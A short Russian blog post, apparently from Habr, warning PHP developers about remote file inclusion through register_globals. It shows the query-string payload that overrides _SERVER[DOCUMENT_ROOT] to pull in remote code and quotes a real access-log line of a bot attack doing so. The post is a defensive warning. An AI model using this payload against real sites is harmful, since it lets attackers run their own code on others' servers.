Как стать автором
Обновить

взлом с помощью register_globals

Время на прочтение1 мин
Количество просмотров944
Недавно познакомился с относительно новой идеей хака для включенных register_globals:
если в коде есть include_once($_SERVER['DOCUMENT_ROOT']."file.php")то
нам достаточно передать строчку вида: "/?_SERVER[DOCUMENT_ROOT]=http://hacksite/hackcode.txt?" чтобы произошла подстановка и выполнение нашего скрипта на сайте потребителя.

41.210.32.69 - - [15/Feb/2009:16:32:00 +0300] "POST /?_SERVER[DOCUMENT_ROOT]=http://fakomaster.freehostia.com/bad.txt? HTTP/1.0" 200 22054 "http://www.mysite.ru//?_SERVER[DOCUMENT_ROOT]=http://fakomaster.freehostia.com/bad.txt?" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6"

Мораль сей басни стара: будьте внимательны и не позволяйте формировать любой запрос через передаваемые параметры.
UPD: Уточняю, уже существует бот на скан подобной уязвимости, и данный лог — реальный, изменен только сайт, с которого этот лог взят, так что это не просто теоретическая уязвимость.
Теги:
Хабы:
Всего голосов 44: ↑21 и ↓23-2
Комментарии25

Публикации